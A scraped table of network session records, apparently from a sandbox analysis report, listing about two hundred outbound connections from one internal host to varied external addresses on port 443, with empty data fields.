                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19946192.168.2.2334458103.195.234.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19947192.168.2.2347356180.170.166.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19948192.168.2.2333686213.97.7.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19949192.168.2.2357528126.24.43.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19950192.168.2.2351590182.54.32.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19951192.168.2.2359872187.131.18.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19952192.168.2.2352082210.133.138.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19953192.168.2.234992243.56.148.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19954192.168.2.2339946125.104.51.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19955192.168.2.2357374195.83.8.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19956192.168.2.2337048112.15.35.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19957192.168.2.233925081.171.0.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19958192.168.2.2336104113.1.172.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19959192.168.2.2360088136.160.125.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19960192.168.2.234734850.76.179.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19961192.168.2.2354732189.148.205.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19962192.168.2.233376227.155.112.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19963192.168.2.234327692.18.131.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19964192.168.2.236058070.166.173.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19965192.168.2.233896044.176.88.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19966192.168.2.2334972194.248.138.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19967192.168.2.236081412.229.149.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19968192.168.2.234580873.3.23.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19969192.168.2.2338878116.230.59.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19970192.168.2.2341110151.185.226.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19971192.168.2.2335242116.253.126.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19972192.168.2.233357064.120.24.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19973192.168.2.233851620.239.61.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19974192.168.2.2341274157.45.131.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19975192.168.2.2344166199.198.135.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19976192.168.2.2352634149.72.131.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19977192.168.2.2350704101.104.101.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19978192.168.2.2344728219.231.1.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19979192.168.2.2333704157.82.145.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19980192.168.2.2351780134.1.238.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19981192.168.2.235923695.212.0.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19982192.168.2.2347724187.255.82.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19983192.168.2.2354666113.255.184.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19984192.168.2.2346958198.207.232.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19985192.168.2.2344426219.137.172.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19986192.168.2.233749270.42.205.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19987192.168.2.2342252195.183.172.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19988192.168.2.2340964183.77.189.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19989192.168.2.2334506105.8.101.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19990192.168.2.2353080165.238.100.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19991192.168.2.2338658208.10.122.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19992192.168.2.235987618.5.170.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19993192.168.2.2334438219.191.87.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19994192.168.2.235918277.145.68.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19995192.168.2.2347078217.99.230.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19996192.168.2.2355726172.112.34.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19997192.168.2.2346888134.133.17.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19998192.168.2.2355602143.143.151.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19999192.168.2.2334638210.111.182.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20000192.168.2.2337170197.176.214.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20001192.168.2.2342020167.43.66.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20002192.168.2.2360134148.51.37.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20003192.168.2.235773241.109.72.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20004192.168.2.2360964173.4.253.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20005192.168.2.2355402101.0.59.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20006192.168.2.233401495.64.254.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20007192.168.2.236095493.155.185.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20008192.168.2.2333750206.212.209.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20009192.168.2.2352408201.170.154.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20010192.168.2.234176680.25.162.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20011192.168.2.2347654181.41.54.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20012192.168.2.233850087.192.244.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20013192.168.2.2341656121.11.196.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20014192.168.2.2342912153.150.1.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20015192.168.2.2336896117.84.83.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20016192.168.2.234896861.198.196.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20017192.168.2.2343492161.175.151.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20018192.168.2.2339856118.34.17.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20019192.168.2.235580867.158.189.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20020192.168.2.234631620.42.119.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20021192.168.2.2352868216.60.252.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20022192.168.2.235368014.231.75.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20023192.168.2.2359438100.227.202.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20024192.168.2.235837865.139.203.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20025192.168.2.233482663.115.174.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20026192.168.2.2338468223.245.140.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20027192.168.2.234062446.78.168.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20028192.168.2.2345516182.171.110.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20029192.168.2.233450849.147.170.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20030192.168.2.2342934153.165.94.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20031192.168.2.2352006148.13.253.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20032192.168.2.2355516153.60.30.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20033192.168.2.234499465.55.242.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20034192.168.2.2356512210.71.202.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20035192.168.2.2339832130.119.110.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20036192.168.2.233712419.146.244.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20037192.168.2.2347554166.14.182.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20038192.168.2.234752873.69.70.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20039192.168.2.2356854121.107.132.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20040192.168.2.235357814.87.67.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20041192.168.2.2353562147.133.55.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20042192.168.2.2344446147.242.200.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20043192.168.2.2336848202.130.51.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20044192.168.2.2358900221.159.248.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20045192.168.2.2353094121.198.98.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20046192.168.2.234148888.71.42.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20047192.168.2.235841257.173.180.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20048192.168.2.2352652143.168.249.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20049192.168.2.2359642142.188.245.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20050192.168.2.234475693.221.226.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20051192.168.2.2342720154.136.230.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20052192.168.2.2336340144.251.18.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20053192.168.2.2342166130.42.185.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20054192.168.2.235405687.116.94.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20055192.168.2.234578825.166.218.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20056192.168.2.2346692167.29.58.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20057192.168.2.2336414202.68.124.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20058192.168.2.234249235.149.175.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20059192.168.2.2347338138.34.248.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20060192.168.2.235184290.171.217.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20061192.168.2.2346258221.249.253.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20062192.168.2.2355564217.25.251.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20063192.168.2.2353426134.32.233.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20064192.168.2.235888647.212.212.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20065192.168.2.2357168143.39.143.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20066192.168.2.234303485.17.68.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20067192.168.2.2343604193.80.120.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20068192.168.2.2348952117.208.190.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20069192.168.2.2356036179.145.74.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20070192.168.2.2338196180.80.92.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20071192.168.2.2355354198.85.233.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20072192.168.2.2349504210.144.29.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20073192.168.2.235731638.13.113.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20074192.168.2.235217086.3.215.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20075192.168.2.235851060.137.191.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20076192.168.2.2339008198.204.19.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20077192.168.2.2333204148.73.229.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20078192.168.2.2344404141.144.105.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20079192.168.2.235967659.124.143.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20080192.168.2.233519889.135.32.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20081192.168.2.233872269.212.235.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20082192.168.2.2342986113.204.75.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20083192.168.2.235069274.171.234.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20084192.168.2.233338643.33.252.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20085192.168.2.2336882208.63.108.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20086192.168.2.2348406199.9.28.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20087192.168.2.2360512202.204.228.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20088192.168.2.2347250223.209.83.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20089192.168.2.2342618199.220.114.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20090192.168.2.235268869.146.54.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20091192.168.2.234221032.53.2.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20092192.168.2.234289219.87.109.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20093192.168.2.2337638181.232.30.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20094192.168.2.2350028142.209.8.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20095192.168.2.2359922131.6.123.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20096192.168.2.2340258108.126.83.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20097192.168.2.233327457.224.10.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20098192.168.2.235656232.33.205.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20099192.168.2.233787495.73.187.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20100192.168.2.233644684.216.182.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20101192.168.2.2355306124.32.30.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20102192.168.2.235246887.146.153.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20103192.168.2.2343270182.163.172.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20104192.168.2.2339030105.209.143.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20105192.168.2.235993694.114.13.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20106192.168.2.2341100148.147.75.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20107192.168.2.2342744125.196.89.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20108192.168.2.235459223.204.0.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20109192.168.2.235732496.1.181.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20110192.168.2.233532848.96.90.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20111192.168.2.23357905.78.177.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20112192.168.2.2358456126.114.156.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20113192.168.2.2355854124.23.69.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20114192.168.2.233766699.232.173.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20115192.168.2.234719827.198.234.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20116192.168.2.2345928154.231.16.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20117192.168.2.2334686162.22.19.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20118192.168.2.23595488.16.140.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20119192.168.2.235064480.126.143.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20120192.168.2.23602901.45.78.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20121192.168.2.234619276.0.137.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20122192.168.2.235232431.27.165.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20123192.168.2.233995620.183.228.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20124192.168.2.2346326142.178.221.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20125192.168.2.2348252208.22.187.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20126192.168.2.235890248.197.90.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20127192.168.2.236051827.210.191.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20128192.168.2.2335160147.103.15.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20129192.168.2.2336332179.19.86.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20130192.168.2.2349802175.33.243.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20131192.168.2.2341078208.130.231.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20132192.168.2.2352638128.69.71.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20133192.168.2.235936287.141.122.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20134192.168.2.2342374139.155.123.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20135192.168.2.2337848110.11.42.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20136192.168.2.23566748.39.162.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20137192.168.2.2334880186.80.16.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20138192.168.2.2343086185.121.110.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20139192.168.2.235568270.82.95.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20140192.168.2.235902023.213.35.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20141192.168.2.233416072.23.28.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20142192.168.2.234074272.185.37.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20143192.168.2.2341978199.189.82.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20144192.168.2.2342600109.143.229.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20145192.168.2.2334514148.203.242.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20146192.168.2.233639027.60.203.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20147192.168.2.2334332150.152.60.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20148192.168.2.2358114186.1.187.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20149192.168.2.235631668.234.244.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20150192.168.2.235168288.10.88.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20151192.168.2.233349691.83.98.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20152192.168.2.233677632.176.213.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20153192.168.2.234166699.150.49.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20154192.168.2.235957479.49.116.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20155192.168.2.2343048138.91.248.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20156192.168.2.235008032.89.161.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20157192.168.2.23331065.193.178.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20158192.168.2.233500446.89.101.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20159192.168.2.233544066.33.138.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20160192.168.2.235374269.207.6.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20161192.168.2.2354868141.76.172.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20162192.168.2.2338484213.97.142.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20163192.168.2.2338806109.196.246.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20164192.168.2.2347410196.109.6.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20165192.168.2.235966639.135.7.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20166192.168.2.233605257.248.185.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20167192.168.2.2360618213.43.165.78443
